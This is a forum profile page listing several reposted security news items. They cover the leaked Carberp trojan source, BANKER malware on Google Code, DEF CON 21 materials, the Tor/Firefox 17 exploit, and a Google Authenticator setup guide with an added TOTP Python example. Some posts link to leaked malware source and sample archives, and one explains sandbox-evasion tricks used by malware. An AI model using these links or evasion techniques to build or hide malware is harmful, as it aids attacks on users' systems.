Usr6

Active Members
  • Posts

    1337
  • Days Won

    89

Everything posted by Usr6

  1. On 25.06 it was posted on rst: https://rstforums.com/forum/71141-sursa-carberp-bootkit-other-c-projects-worth-60k.rst. A story behind the leak: Touch My Malware: Carberp source code, days away from full leak; Touch My Malware: Carberp source code now leaked
  2. Google Code is Google’s official open source site meant for developers to host their program’s source code and related files, mostly in text format. However, using our sourcing system in Brazil, we were able to capture a malware written in Java that downloads BANKER malware from a recently created project called “flashplayerwindows”. Of course, this bogus project has nothing to do with Adobe. The said file (detected as JAVA_DLOAD.AFJ) is a compiled file that downloads and executes the “AdobeFlashPlayer.exe”, which we have verified to be malicious (detected as TROJ_BANLOAD.JFK). Once executed, this Trojan connects to Google Code to download other files. The people behind this threat may have uploaded these files to the said Google Code page, which notably include BANKER variants. These malware are notorious for stealing banking and email account information. Typically, they perform their data stealing routine by using phishing sites spoofing banking sites to lure users into disclosing information. Once they gather these data, they can use these to initiate unauthorized transactions such as money transfers. Previously, BANKER malware were seen hosted on compromised Brazilian government sites, which affected users from Brazil, the United States, and Angola. Another fraud project containing malware was also discovered, which goes to show that similar threats might still be out there. Besides the danger of the BANKER malware, this use of a well-known site like Google Code provides a good cover-up for cybercriminals. The malware being hosted in an official Google website means that downloading the malware will be encrypted with valid SSL certificates, which can bypass traditional security technologies. Because Google is a legitimate and reputable domain, traditional reputation services may not prevent the downloading. If this threat seems familiar, it’s because this abuse of open-source project sites has been done before.
    Last June, we blogged about GAMARUE variants being hosted on SourceForge, which like Google Code, is popular among developers and users alike. This incident shows that, as we have predicted for 2013, legitimate cloud providers like Google Code are likely to come under attack this year. With services like Google Code likely to gain traction among users, we can expect that similar cases will appear (and increase) in the coming days. Trend Micro protects users from this by detecting and deleting these BANKER variants. As of this writing, the said files are no longer available on Google Code. Source: BANKER Malware Found Hosted on Google Code | Security Intelligence Blog | Trend Micro
  3. Using 82,944 processors of one of the largest supercomputers in the world, scientists managed to imitate one second of human brain activity in about 40 minutes. The largest simulation of a neural network in the world was carried out by Japanese and German scientists working with the K Computer, a Japanese machine that two years ago was recognized as the fastest computer. According to the scientists, 82,944 processors were needed to simulate, in 40 minutes, a single second of neural activity. For the simulation to work, the scientists also used 1.73 billion visual neurons connected to 10.4 trillion synapses. Each virtual synapse, positioned between excitatory neurons, contained 24 bytes of memory, thus allowing an exact mathematical description of the network. The simulation itself was carried out using special simulation software called NEST and used about one petabyte of memory (the equivalent of the memory of 250,000 PCs). The simulation was not designed to imitate the real activity of the human brain (the synapses being connected at random), but only the power of the network. Although it was carried out on a very large scale, the simulation represented only 1% of the neural network of the human brain. “If peta-scale computers such as the K computer are capable of imitating 1% of the neural network of the human brain, then we know that simulating the whole brain will be achievable with the help of more powerful computers that we hope to have available in the next decade,” explained Markus Diesmann. Source: How long did a supercomputer need to imitate one second of the human brain’s neural activity? In English: This computer took 40 minutes to simulate one second of brain activity
  4. SPEAKER MATERIALS - LIST OF PRESENTATIONS:
    • Abraham Kang and Dinis Cruz: DEFCON-21-Kang-Cruz-RESTing-On-Your-Laurels-Will-Get-You-Pwned.pdf
    • Alejandro Caceres: DEFCON-21-Caceres-Massive-Attacks-With-Distributed-Computing.pdf
    • Alexandre Pinto: DEFCON-21-Pinto-Defending-Networks-Machine-Learning-WP.pdf, DEFCON-21-Pinto-Defending-Networks-Machine-Learning.pdf
    • Amber Baldet: DEFCON-21-Baldet-Suicide-Intervention-Risk-Assessment-Tactics.pdf
    • Andy Davis: DEFCON-21-Davis-Revealing-Embedded-Fingerprints.pdf
    • Balint Seeber: DEFCON-21-Balint-Seeber-All-Your-RFz-Are-Belong-to-Me.pdf
    • Bogdan Alecu: DEFCON-21-Bogdan-Alecu-Attacking-SIM-Toolkit-with-SMS-WP.pdf, DEFCON-21-Bogdan-Alecu-Business-Logic-Flaws-in-MO.pdf
    • Brendan O'Connor: DEFCON-21-OConnor-Stalking-a-City-for-Fun-and-Frivolity.pdf
    • Brian Gorenc and Jasiel Spelman: DEFCON-21-Gorenc-Spelman-Java-Every-days-WP.pdf, DEFCON-21-Gorenc-Spelman-Java-Every-days.pdf
    • Chris John Riley: DEFCON-21-Riley-Defense-by-Numbers.pdf
    • Chris Sumner and Randall Wald: DEFCON-21-Sumner-Wald-Prediciting-Susceptibility-To-Social-Bots-On-Twitter.pdf
    • Christine Dudley: DEFCON-21-Dudley-Privacy-In-DSRC-Connected-Vehicles.pdf
    • Craig Young: DEFCON-21-Young-Google-Skeleton-Key.pdf; Extras: DEFCON-21-Craig-Young-Android-PoC-StockView-with-SSL.apk, DEFCON-21-Craig-Young-Android-PoC-StockView.apk, DEFCON-21-Craig-Young-Android-PoC-TubeApp.apk, DEFCON-21-Craig-Young-StockView-ExampleCode.java
    • Crowley and Panel: DEFCON-21-Crowley-Savage-Bryan-Home-Invasion-2.0-WP.pdf, DEFCON-21-Crowley-Savage-Bryan-Home-Invasion-2.0.pdf; Extras: upnp_request_gen (LICENSE.txt, readme.txt, upnp_request_gen.php)
    • Dan Griffin: DEFCON-21-Dan-Griffin-Protecting-Data.pdf
    • Daniel Chechik: DEFCON-21-Chechik-Utilizing-Popular-Websites-for-Malicious-Purposes-Using-RDI.pdf
    • Daniel Selifonov: DEFCON-21-Selifonov-A-Password-is-Not-Enough-Why-Disk-Encryption-is-Broken.pdf
    • Eric Fulton and Daniel Zolnikov: DEFCON-21-Fulton-Zolnikov-The-Politics-of-Privacy-and-Technology.pdf
    • Eric Milam: DEFCON-21-Milam-Getting-The-Goods-With-smbexec.pdf
    • Eric Robi and Michael Perklin: DEFCON-21-Robi-Perklin-Forensic-Fails.txt
    • Etemadieh and Panel: DEFCON-21-Etemadieh-Panel-Google-TV-Secure-Boot-Exploit-GTVHacker.pdf
    • Fatih Ozavci: DEFCON-21-Ozavci-VoIP-Wars-Return-of-the-SIP.pdf; Extras: DEFCON-21-viproy-voipkit.tgz
    • Flipper: DEFCON-21-Flipper-10000-Yen.pdf; Extras: Defcon 21 - 10000 Yen Source Code.txt, OpenGlider BoM.pdf, OpenGlider V0.1.x_t.txt, x35 coordinates.sldcrv.txt, OpenGlider IGES Files
    • Franz Payer: DEFCON-21-Payer-Exploiting-Music-Streaming-with-JavaScript.pdf
    • Gregory Pickett: DEFCON-21-Pickett-Lets-Screw-With-NMAP.pdf; Extras: DEFCON-21-Pickett-Lets-Screw-With-NMAP-Specifications.pdf, DEFCON-21-Pickett-Lets-Screw-With-NMAP-Transformations.pdf, platform.zip, scans.zip
    • Hunter Scott: DEFCON-21-Scott-Security-in-Cognitive-Radio-Networks.pdf
    • Jacob Thompson: DEFCON-21-Thompson-CREAM-Cache-Rules-Evidently-Ambiguous-Misunderstood.pdf
    • Jaeson Schultz: DEFCON-21-Schultz-Examining-the-Bitsquatting-Attack-Surface-WP.pdf
    • Jason Staggs: DEFCON-21-Staggs-How-to-Hack-Your-Mini-Cooper-WP.pdf, DEFCON-21-Staggs-How-to-Hack-Your-Mini-Cooper.pdf; Extras: DEFCON-21-CANClockProof-of-ConceptDemo.wmv, DEFCON-21-CANClockSource.pde, DEFCON-21-MINI-Cooper-Crash-Test.wmv
    • Jim Denaro: DEFCON-21-Denaro-How-to-Disclose-or-Sell-an-Exploit.pdf
    • Joe Bialek: DEFCON-21-Bialek-PowerPwning-Post-Exploiting-by-Overpowering-Powershell.pdf; Extras: DEFCON-21-Invoke-ReflectivePEInjection.ps1.txt
    • Joe Grand: DEFCON-21-Grand-JTAGulator.pdf; Extras: DEFCON-21-jtagulatorassembly.pdf, DEFCON-21-jtagulatorblockdiagram.pdf, DEFCON-21-jtagulatorbom.pdf, DEFCON-21-jtagulatorschematic.pdf, DEFCON-21-jtagulatortestproc.pdf, Firmware 1.1 (b9b49b3), Gerbers B
    • John Ortiz: DEFCON-21-Ortiz-Fast-Forensics-Using-Simple-Statistics-and-Cool-Tools.pdf; Extras: DEFCON-21-Ortiz-TOOLSCustom.zip, DEFCON-21-Ortiz-TOOLSFreeDownload.zip
    • Joseph Paul Cohen: Extras: DEFCON-21-blucat.base64, blucat-r50
    • Justin Engler and Paul Vines: DEFCON-21-Engler-Vines-Electromechanical-PIN-Cracking-WP.pdf, DEFCON-21-Engler-Vines-Electromechanical-PIN-Cracking.pdf; Extras: DEFCON-21-Codepartslistinstructions.zip
    • Justin Hendricks: DEFCON-21-Justin-Hendricks-So-You-Think-Your-Domain-Controller-Is-Secure.pdf
    • Karl Koscher and Eric Butler: DEFCON-21-Koscher-Butler-The-Secret-Life-of-SIM-Cards.pdf
    • Lawrence and Panel: DEFCON-21-Lawrence-Johnson-Karpman-Key-Decoding-and-Duplication-Schlage.pdf; Extras: DEFCON-21-config.scad, DEFCON-21-key.scad
    • Marc Weber Tobias and Tobias Bluzmanis: DEFCON-21-Tobias-Bluzmanis-Insecurity-A-Failure-of-Imagination.pdf
    • Marion Marschalek: DEFCON-21-Marschalek-Thorny-Malware.pdf; Extras: DEFCON-21-Marschalek-MalwareBase64.txt, DEFCON-21-Marschalek-Thorny-Malware-Analysis-Report.pdf
    • Melissa Elliott: DEFCON-21-Elliott-noisefloor-URLS-reference.txt
    • Michael Perklin: DEFCON-21-Perklin-ACL-Steganography.pdf.pdf; Extras: ACLEncode.sln, README.txt
    • Michael Schrenk: DEFCON-21-Schrenk-How-my-Botnet-Defeated-Russian-Hackers.pdf
    • Ming Chow: DEFCON-21-Chow-Abusing-NoSQL-Databases.pdf
    • Neil Sikka: DEFCON-21-Sikka-EMET-4.0-PKI-Mitigation.pdf
    • Nicolas Oberli: DEFCON-21-Oberli-Please-Insert-Inject-More-Coins.pdf
    • Nikhil Mittal: DEFCON-21-Mittal-Powerpreter-Post-Exploitation-Like-a-Boss.pdf; Extras: Nikhil_Mittal_Powerpreter_Code.psm1
    • Pau Oliva Fora: DEFCON-21-Fora-Defeating-SEAndroid.pdf
    • Philip Polstra: DEFCON-21-Polstra-We-are-Legion-Pentesting.pdf; Extras: DEFCON-21-Philip-Polstra-code.py.txt
    • Phorkus and Evilrob: DEFCON-21-Phorkus-Evilrob-Hacking-Embedded-Devices-Bad-things-to-Good-hardware.pdf
    • Piotr Duszynski: DEFCON-21-Duszynski-Cyber-Offenders.pdf
    • Pukingmonkey: DEFCON-21-Pukingmonkey-The-Road-Less-Surreptitiously-Traveled.pdf; Extras: 01_ALPR_detector_proof_of_concept.mp4, 02_ezpass_detector_of_open_road_tolling.mp4, 03_ezpass_detector_of_hidden_reader.mp4, 04_ezpass_detector_of_hidden_reader_with_toll_tag_sensor.mp4, DEFCON-21-05ezpassdetectortimessquaretomsgin90seconds-(1).mp4, DEFCON-21-05ezpassdetectortimessquaretomsgin90seconds.mp4, arduino-micro
    • Remy Baumgarten: DEFCON-21-Baumgarten-Mach-O-Viz-WP.pdf, DEFCON-21-Baumgarten-Mach-O-Viz.pdf
    • Richard Thieme: DEFCON-21-Richard-Thieme-UFOs-and-Govt.pdf; Extras: DEFCON-21-Richard Thieme-UFOs-and-Govt-Resources.txt
    • Ricky Hill: DEFCON-21-Ricky-Hill-Phantom-Drone.pdf
    • Robert Clark: DEFCON-21-Clark-Legal-Aspects-of-Full-Spectrum-Computer-Network-Active-Defense.pdf
    • Robert Stucke: DEFCON-21-Stucke-DNS-Hazards.pdf
    • Runa A Sandvik: DEFCON-21-Sandvik-Safety-of-the-Tor-Network.pdf
    • Ryan Holeman: DEFCON-21-Holeman-The-Bluetooth-Device-Database.pdf; Extras: src, analytics
    • Sam Bowne: DEFCON-21-Bowne-SSD-Data-Evap.pdf
    • Sam Bowne and Matthew Prince: DEFCON-21-Bowne-Prince-Evil-DoS-Attacks-and-Strong-Defenses.pdf
    • Scott Behrens and Brent Bandelgar: DEFCON-21-Behrens-Bandelgar-MITM-All-The-IPv6-Things.pdf
    • Teal Rogers and Alejandro Caceres: DEFCON-21-Rogers-Caceres-The-Dawn-of-Web-30.pdf
    • Tom Keenan: DEFCON-21-Tom-Keenan-Torturing-Open-Government-Systems-for-Fun.pdf
    • Tom Steele and Dan Kottman: DEFCON-21-Steele-Kottman-Collaborative-Penetration-Testing-With-Lair.pdf
    • Tony Mui and Wai-leng: DEFCON-21-Miu-Lee-Kill-em-All-DDoS-Protection-Total-Annihilation.pdf; Extras (empty)
    • Vaagn Toukharian and Tigran Gevorgyan: DEFCON-21-Toukharian-Gevorgyan-HTTP-Time-Bandit.pdf
    • Wesley McGrew: DEFCON-21-McGrew-Pwn-The-Pwn-Plug .pdf, DEFCON-21-McGrew-Pwn-The-Pwn-Plug-WP.pdf; Extras: DEFCON-21-community1.1vswireless1.1.txt, DEFCON-21-exploitpacketpayload.dat, DEFCON-21-originalubootenv.txt, DEFCON-21-ubi.py
    • WiK and Mubix: DEFCON-21-WiK-Mubix-gitDigger.pdf
    • Zak Blacher: DEFCON-21-Blacher-Transcending-Cloud-Limitations.pdf; Extras: DEFCON-21-Scripted-Demo.tar, DEFCON-21-source-Code-dpk-master.zip
    • Zoz: DEFCON-21-Zoz-Hacking-Driverless-Vehicles.pdf
    • bughardy and Eagle1753: DEFCON-21-bughardy-Eagle1753-OPT-circumventing-in-MIFARE-ULTRALIGHT-WP.pdf, DEFCON-21-bughardy-Eagle1753-OPT-circumventing-in-MIFARE-ULTRALIGHT.pdf
    • m0nk: DEFCON-21-m0nk-BoutiqueKit.pdf
    • soen: DEFCON-21-soen-Evolving-Exploits-Through-Genetic-Algorithms.pdf
    Download: http://www.mediafire.com/download/15p2r0tk1787h30/Defcon_21_-_2013_Speaker_Presentations_DVD.zip
    Mirror: https://rstforums.com/fisiere/defcon.zip
    Source: contagio: Defcon 21 Archives Speaker Materials
  5. Usr6

    TOR Firefox 0-day

    @studentul, from http://tsyrklevich.net/tbb_payload.txt: "... includes the host name (via gethostname()) and the MAC address of the local host". Yes, you're right, it's hard to go to the ISP and ask for the address of the person who had that IP at 20:02; maybe you forgot that all ISPs are required to keep logs for 6 months (connection time, disconnection time, etc.), or, even simpler, to ask who the contract holder is for the PC with MAC x (being on the LAN, the ISP knows all the MACs on the network). Having the MAC, they don't much care whether the person wipes the evidence from the HDD or even throws it out the window. L.E. @daat: having the MAC of the PC that visited the site, those people won't be able to claim that their PC was hacked and turned into a proxy; if they managed to get their real IP, it identifies them. Changing the network card 5 times a day: you forgot that ISPs have logs: user : mac : ip : connect time : disconnect time. When you've had the same MAC for the last 5 months, you can't claim you changed the card, or the neighbour came over, etc. :))
  6. A start-up based in Helsinki has developed the world's first facial recognition payment system. Independent.co.uk writes that this new system will essentially turn your face into a PIN code, and even if someone has plastic surgery to look exactly like you, the system will manage to tell the original from the copy. Anyway, the surgery could cost more than the victim has in their account. Dubbed "the fastest payment system in the world", the technology will recognize individuals from the moment they approach the checkout, the British noting that "the whole payment process can thus be completed in about 5 seconds." For now, this idea seems risky, but the makers of the software say it relies on "military-grade algorithms" and that the system will be almost impossible to break. Even so, we would stress the word "almost". "Our cameras don't use photographs but a mathematical model of the face, which means that each one will be unique," says Ruslan Pisarenko, development director of the start-up Uniqul. "Even twins will be told apart. We have also been asked about people who have plastic surgery. The system will be able to recognize and distinguish whether a person is real or just a mask," he added. Uniqul wants to deploy the first systems of this kind within a month, and if they produce results, it plans to expand the project. One thing is certain. There's a good chance that a clown at work will have trouble withdrawing money with this system. Otherwise, the idea sounds excellent. Or "almost" excellent, to return to an idea from above. Source: Finland announces "the fastest payment system in the world". Facial recognition instead of the PIN code
  7. A claimed zero-day vulnerability in Firefox 17 has some users of the latest Mozilla Firefox browser (Firefox 22) shrugging their shoulders. Indeed, for now it appears that this flaw is not a concern for regular, up-to-date Firefox end users. But several experts say the vulnerability was instead exposed and used in tandem with a recent U.S. law enforcement effort to discover the true Internet addresses of people believed to be browsing child porn sites via the Tor Browser — an online anonymity tool powered by Firefox 17. Tor software protects users by bouncing their communications across a distributed network of relays run by volunteers all around the world. As the Tor homepage notes, it prevents anyone who might be watching your Internet connection from learning what sites you visit, it prevents the sites you visit from learning your physical location, and it lets users access sites that are blocked by Internet censors. The Tor Browser bundle also is the easiest way to find Web sites that do not want to be easily taken down, such as the Silk Road (a.k.a. the “eBay of hard drugs“) and sites peddling child pornography. On Saturday, Aug. 3, 2013, Independent.ie, an Irish news outlet, reported that U.S. authorities were seeking the extradition of Eric Eoin Marques, a 28-year-old with Irish and American citizenship reportedly dubbed by the FBI as “the largest facilitator of child porn on the planet.” According to the Independent, Marques was arrested on a Maryland warrant that includes charges of distributing and promoting child porn online. The Tor Project’s blog now carries a post noting that at approximately midnight on August 4th “a large number of hidden service addresses disappeared from the Tor Network, sites that appear to have been tied to an organization called Freedom Hosting – a hosting service run on the Tor Network allegedly by Marques. 
Hidden services can be used to run a variety of Web services that are not directly reachable from a normal Internet connection — from FTP and IRC servers to Web sites. As such, the Tor Network is a robust tool for journalists, whistleblowers, dissidents and others looking to publish information in a way that is not easily traced back to them. “There are rumors that a hosting company for hidden services is suddenly offline and/or has been breached and infected with a javascript exploit,” writes “phobos,” a Tor Project blogger. Phobos notes that the person, or persons, who run Freedom Hosting are in no way affiliated or connected to The Tor Project, Inc., the organization coordinating the development of the Tor software and research, and continues: “The current news indicates that someone has exploited the software behind Freedom Hosting. From what is known so far, the breach was used to configure the server in a way that it injects some sort of javascript exploit in the web pages delivered to users. This exploit is used to load a malware payload to infect user’s computers. The malware payload could be trying to exploit potential bugs in Firefox 17 ESR, on which our Tor Browser is based. We’re investigating these bugs and will fix them if we can.” Even if the claimed vulnerability is limited to Firefox version 17, such a flaw would impact far more than just Tor bundle users. Mozilla says it has been notified of a potential security vulnerability in Firefox 17, which is currently the extended support release (ESR) version of Firefox. Last year, Mozilla began offering an annual ESR of Firefox for enterprises and others who didn’t want to have to keep up with the browser’s new rapid release cycle. “We are actively investigating this information and we will provide additional information when it becomes available,” Michael Coates, director of security assurance at Mozilla, wrote in a brief blog post this evening. 
    Ofir David, head of intelligence for Israeli cybersecurity firm Cyberhat, said he believes the now-public exploit code is indeed related to Marques’ arrest. David said someone appears to have gained access to Freedom Hosting and injected malicious HTML code that checks the visitor’s browser to see if he is using Firefox 17. If so, the code silently redirects that visitor’s browser to another site which generates a unique identifier called a ‘UUID.’” David said that although the exploit can be used to download and run malicious code on the visitor’s computer, whoever infiltrated Freedom Hosting appears to have only used the exploit to gather the true Internet addresses of people visiting the child porn sites hosted there. “Ironically, all [the malicious code] does is perform a GET request to a new domain, which is hosted outside of the Tor network, while transferring the same UUID,” David said. “That way, whoever is running this exploit can match any Tor user to his true Internet address, and therefore track down the Tor user.” For more on this developing story, check out this Reddit thread. Also, Mozilla has an open Bugzilla entry analyzing the exploit code. Source: Firefox Zero-Day Used in Child Porn Hunt? — Krebs on Security. On the same subject: Alleged Tor hidden service operator busted for child porn distribution: ... The servers themselves are likely run on a "bulletproof" hosting service in Romania or Russia; Irish law enforcement authorities told the court Friday that Marques had transferred large sums of money to accounts in Romania and had been investigating obtaining a visa to enter Russia. Marques, for his part, claimed that he was helping out friends in Romania... Alleged Tor hidden service operator busted for child porn distribution | Ars Technica
  8. Information security firm Trustwave has reported a potential cyber-attack vector for a device to which you may never have expected the phrase "security vulnerability" to be applied (other than in reference to the end of a toilet paper roll, that is). In an advisory issued August 1, Trustwave warned of a Bluetooth security vulnerability in Inax's Satis automatic toilet. Functions of the Satis—including the raising and lowering of its lid and operation of its bidet and flushing nozzles—can be remotely controlled from an Android application called "My Satis" over a Bluetooth connection. But the Bluetooth PIN to pair with the toilet—"0000"—is hard-coded into the app. "As such, any person using the 'My Satis' application can control any Satis toilet," the security advisory noted. "An attacker could simply download the 'My Satis' application and use it to cause the toilet to repeatedly flush, raising the water usage and therefore utility cost to its owner. Attackers could cause the unit to unexpectedly open/close the lid, [or] activate bidet or air-dry functions, causing discomfort or distress to user." And you thought the only thing you had to worry about was dropping your phone into the toilet. Source: Holy sh*t! Smart toilet hack attack! | Ars Technica
  9. We can already use two-step authentication in GMail with the Google Authenticator Android app. The idea is creating a secret key shared between the service and the Android app, so every 30 seconds we get a randomly generated token on Android that must be provided to log in, in addition to the password. That token is only valid in that 30s time frame. Since this provides a nice second security layer to our logins, why not take advantage of it on our Linux box as well? We'll need two things to get started:
    • Install Google Authenticator on our Android, iOS or Blackberry phone.
    • Install the PAM module on our Linux box.
    The first step is frivolous, so we will just move on to the second one. To set up two-factor authentication for your Linux server you will need to download and compile the PAM module for your system. The examples here will be based on CentOS 6, but it should be easy enough to figure out the equivalents for whatever distribution you happen to be using. Here is a link with similar steps for Ubuntu/Debian or any OS using Aptitude.
    $ sudo yum install pam-devel
    $ wget https://google-authenticator.googlecode.com/files/libpam-google-authenticator-1.0-source.tar.bz2
    $ tar xvfj libpam-google-authenticator-1.0-source.tar.bz2
    $ cd libpam-google-authenticator-1.0
    $ make
    $ sudo make install
    $ sudo vim /etc/pam.d/sshd
    Once the PAM module and the command-line google-authenticator application are installed, you need to edit the /etc/pam.d/sshd file and add the lines below at the very top of the file.
    auth required pam_sepermit.so
    auth required pam_google_authenticator.so
    auth include password-auth
    Additionally, you may wish to add the two-step authentication to your display manager (kdm, gdm, or lightdm). Depending on your distro you might be using a different login manager. Pick and edit the correct file among these:
    · /etc/pam.d/gdm
    · /etc/pam.d/lightdm
    · /etc/pam.d/kdm
    Add this line at the bottom:
    auth required pam_google_authenticator.so
    Once we have that installed we will run this command as the user we want to use two-step authentication with. If we want to use it for several users, we will have to run it once for each of them, since it generates a unique secret key each time:
    % google-authenticator
    Do you want me to update your "~/.google_authenticator" file (y/n) y
    https://www.google.com/chart?chs=200x200&chld=M|0&cht=qr&chl=otpauth://totp/user@server%3Fsecret%3DABCD12E3FGHIJKLMN
    Your new secret key is: ABCD12E3FGHIJKLMN
    Your verification code is 98765432
    Your emergency scratch codes are:
      01234567
      89012345
      67890123
      45678901
      23456789
    Do you want to disallow multiple uses of the same authentication token? This restricts you to one login about every 30s, but it increases your chances to notice or even prevent man-in-the-middle attacks (y/n) y
    By default, tokens are good for 30 seconds and in order to compensate for possible time-skew between the client and the server, we allow an extra token before and after the current time. If you experience problems with poor time synchronization, you can increase the window from its default size of 1:30min to about 4min. Do you want to do so (y/n) n
    If the computer that you are logging into isn't hardened against brute-force login attempts, you can enable rate limiting for the authentication module. By default, this limits attackers to no more than 3 login attempts every 30s. Do you want to enable rate-limiting (y/n) y
    Once you see the above text in your terminal window, the very next thing you will do is launch your web browser and point it to the URL shown towards the top of the text above. You should now see a big QR code. Open your Google Authenticator app on your phone of choice, hit the menu button, then select "Scan barcode". Point the camera at the QR code on the screen and you'll get a new item on the Google Authenticator main screen with an ID for the user and computer and the generated token below, along with a counter showing how much time is left before the code expires. TIP: time is very important, so your Linux server should have an NTP client installed in order to keep the time accurate. You should definitely keep an eye on this, and if you have any trouble you may have to open up the window size as noted by google-authenticator. TIP: You will also need to edit /etc/ssh/sshd_config to enable "ChallengeResponseAuthentication" and "UsePAM" (set them both to "yes"). Finally, restart sshd to commit the changes you just made. When this is done, try logging into the system via SSH:
    % ssh <your server>
    Verification code:
    Password:
    Last login: Tue May 10 11:54:21 2011 from client.example.com
    You must provide the verification code as presented by your phone in order to log in. Even if the password is known, without the verification code the login will fail. Important: you will not be able to use this method if you use SSH private/public keys, as the two are mutually exclusive. The two-step authentication will keep users out of your box as long as they don't also have access to your phone, but you shouldn't forget that there's no way to really secure a box if the attacker has physical access to it. The secret key is stored in your home folder. The attacker could boot your box from a Live CD, get the key, generate tokens and have access to your Linux server. Then again, the same thing holds true for your user password, so that's not to say that two-step authentication is not secure; it's just that it has the same problems as any other login method when it comes to physically accessible machines. Source: ISC Diary | How To: Setting Up Google's Two-Factor Authentication In Linux
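    As an added example (not part of the ISC Diary post above, nor code from the google-authenticator project), the following Python script implements the TOTP scheme that the PAM module verifies: 30-second steps, the one-extra-token-each-side skew window the setup dialog calls "1:30min", and the "disallow multiple uses of the same authentication token" rule. The secret and timestamps are the RFC 6238 test values, not the ones shown in the post.

```python
import base64
import hashlib
import hmac
import struct
import time

STEP_SECONDS = 30   # token lifetime used by google-authenticator
DIGITS = 6          # code length shown in the Authenticator app


def hotp(secret_b32: str, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, dynamically truncated."""
    raw = secret_b32.strip().upper()
    key = base64.b32decode(raw + "=" * (-len(raw) % 8))      # tolerate unpadded base32
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    binary = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(binary % (10 ** digits)).zfill(digits)


def totp(secret_b32: str, at_time: float, step: int = STEP_SECONDS) -> str:
    """RFC 6238 TOTP: HOTP with the counter derived from Unix time (what the phone shows)."""
    return hotp(secret_b32, int(at_time) // step)


class TotpVerifier:
    """Server-side check mirroring the two options asked during setup.

    window: extra time steps accepted on each side of the current one; 1 means
            three codes, i.e. the "1:30min" default (raise it only if NTP is not
            keeping the clocks in sync, as the post warns).
    disallow_reuse: reject a code whose time step is not newer than the last
            step already accepted, so a captured code cannot be replayed.
    """

    def __init__(self, secret_b32: str, window: int = 1,
                 disallow_reuse: bool = True, step: int = STEP_SECONDS):
        self.secret = secret_b32
        self.window = window
        self.disallow_reuse = disallow_reuse
        self.step = step
        self.last_accepted_step = None

    def verify(self, code: str, at_time: float = None) -> bool:
        if not code.isdigit():
            return False
        if at_time is None:
            at_time = time.time()
        current = int(at_time) // self.step
        for delta in range(-self.window, self.window + 1):
            candidate = current + delta
            # constant-time comparison so response timing does not leak matching digits
            if hmac.compare_digest(hotp(self.secret, candidate), code):
                if (self.disallow_reuse and self.last_accepted_step is not None
                        and candidate <= self.last_accepted_step):
                    return False            # same or older step: treat as a replay
                self.last_accepted_step = candidate
                return True
        return False


# Constructed input: the RFC 6238 Appendix B seed "12345678901234567890", base32-encoded,
# which is the form google-authenticator prints as "Your new secret key".
TEST_SECRET = base64.b32encode(b"12345678901234567890").decode()


def demo() -> dict:
    """Walk through the behaviours the setup dialog describes; every value should be True."""
    v = TotpVerifier(TEST_SECRET)
    first = v.verify(totp(TEST_SECRET, 59), 59)              # fresh code, accepted
    replay = v.verify(totp(TEST_SECRET, 59), 75)             # same code 16 s later, rejected
    skewed = TotpVerifier(TEST_SECRET).verify(               # phone one step ahead of server
        totp(TEST_SECRET, 1111111111), 1111111109)
    strict = TotpVerifier(TEST_SECRET, window=0).verify(     # no skew window: rejected
        totp(TEST_SECRET, 1111111111), 1111111109)
    return {"accepted": first, "replay_rejected": not replay,
            "skew_tolerated": skewed, "zero_window_rejects_skew": not strict}


if __name__ == "__main__":
    print("code at T=59:", totp(TEST_SECRET, 59))
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```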
  10. Diamonds are a girl’s best friend. Prime numbers are a mathematician’s best friend. And file-based sandboxes are an IT security researcher’s best friend. Unfortunately, malware authors know this. Aware that researchers are using sandboxes to monitor file behavior, attackers are building sandbox-evading techniques into new advanced persistent threat (APT) attacks — and even using these tricks to resurrect notorious malware classics. As my colleague Zheng Bu and I explain in an upcoming presentation at the Black Hat USA conference, malware is using a variety of checks to determine whether it is running in a sandbox and “play dead” until it reaches a live target. These checks fall into several categories:
    • Human interaction — mouse clicks and dialog boxes
    • Configuration-specific — sleep calls, time triggers, and process hiding
    • Environment-specific — version, embedded iframes, and DLL loaders
    • VMware-specific — system-service lists, unique files, and the VMX port
    Here are a few recent examples we have found.
    Khelios: The Khelios botnet, declared dead in 2011, has since been resurrected. To evade detection within file-based sandboxes, one of the new Khelios samples (also known as the Trojan Nap) found in 2013 calls the SleepEx() API with a 10-minute time out. Because most sandboxes are set to execute a sample for a short time frame (usually seconds), the Nap sample simply delays malicious activity beyond the monitored time period of most sandboxes to evade detection. The sample called the undocumented Windows API function NtDelayExecution() to perform an extended sleep call.
    Poison Ivy: The infamous remote-access tool Poison Ivy, which has been used extensively in targeted attacks, appears to have not been significantly updated since 2008. But a 2012 sample of the Trojan UpClicker, which is used as a wrapper around Poison Ivy, employs the SetWindowsHookEx() API function to hide its malicious activity. By sending 0EH as the parameter to the function, the malicious code is activated only when the left mouse button is clicked and released. Because most file-based sandboxes do not mimic human interaction, this malware remains dormant during analysis and evades detection.
    PushDo: PushDo, yet another infamous malware example, checks the build number of the Windows OS. Once identified, it finds a pointer to the PspCreateProcessNotify() API routine to deregister all existing process callbacks — including any of the sandbox’s monitoring modules. Once all callbacks are deregistered, the malware creates and deletes processes without being detected.
    Hastati: Trojan Hastati was designed to wipe out all the hard drives of a computer in Korea. It used the GetLocalTime() API function to activate itself at 2 PM on March 20, 2013. If the sample is monitored in a file-based sandbox before that time and date, it does not execute, evading detection.
    UpClicker, PushDo, and Nap are just some of the resurrected advanced malware that use evasion techniques against file-based sandboxes. In the first part of our Black Hat presentation, we provide an in-depth, technical analysis of these evasion methods, which bypass sandboxes commonly used by the anti-virus industry. The talk also compares the effectiveness of three file-based sandboxes in detecting these tactics. And we will provide a live demonstration of some of these anti-analysis techniques operating in the wild. Source: Hot Knives Through Butter: Bypassing File-based Sandboxes | FireEye Blog
  11. Researchers have managed to implant false memories in the brain and have understood why we remember events that never happened

Have you ever remembered an event in a completely wrong way, while being convinced that it happened exactly as you remember it? Most people have experienced such a sensation, which shows that human memory is not always reliable.

A new study shows that false memories are very easy to generate. Researchers at the Riken–MIT Center for Neural Circuit Genetics created false memories in the brains of mice using a method they say would also work in humans.

The researchers used a technique that involves activating neurons with light to train mice to "remember" a painful experience in a context completely different from the one in which they actually experienced the pain. The false memories were encoded in the brain by brain cells in the same way real memories are encoded.

Even without manipulation by scientists, memories are unreliable. Numerous studies have shown the limits of courtroom testimony, but very few studies have analyzed how false memories are formed at the cellular level.

